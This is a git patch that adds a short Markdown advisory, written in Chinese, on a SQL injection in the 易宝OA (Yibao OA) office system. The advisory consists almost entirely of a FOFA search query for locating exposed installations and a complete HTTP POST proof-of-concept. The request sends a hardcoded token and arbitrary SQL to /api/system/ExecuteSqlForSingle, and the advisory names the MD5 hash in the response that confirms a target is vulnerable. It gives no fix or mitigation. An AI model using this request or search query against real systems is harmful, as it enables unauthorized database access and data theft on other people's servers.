From acf21f63536914d615588ca36903020149179697 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Tue, 28 Nov 2023 19:08:57 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=98=93=E5=AE=9DOA=20ExecuteSqlForSi?= =?UTF-8?q?ngle=20SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 易宝OA ExecuteSqlForSingle SQL注入漏洞.md | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 易宝OA ExecuteSqlForSingle SQL注入漏洞.md diff --git a/易宝OA ExecuteSqlForSingle SQL注入漏洞.md b/易宝OA ExecuteSqlForSingle SQL注入漏洞.md new file mode 100644 index 0000000..44797b1 --- /dev/null +++ b/易宝OA ExecuteSqlForSingle SQL注入漏洞.md @@ -0,0 +1,19 @@ +## 易宝OA ExecuteSqlForSingle SQL注入漏洞 + +## fofa +``` +product="顶讯科技-易宝OA系统" +``` + +## poc +``` +POST /api/system/ExecuteSqlForSingle HTTP/1.1 +Host: IP:PORT +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 +Content-Length: 103 + +token=zxh&sql=select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)&strParameters +``` +发送poc 在返回包中存在 `e10adc3949ba59abbe56e057f20f883e` 字符为存在漏洞 +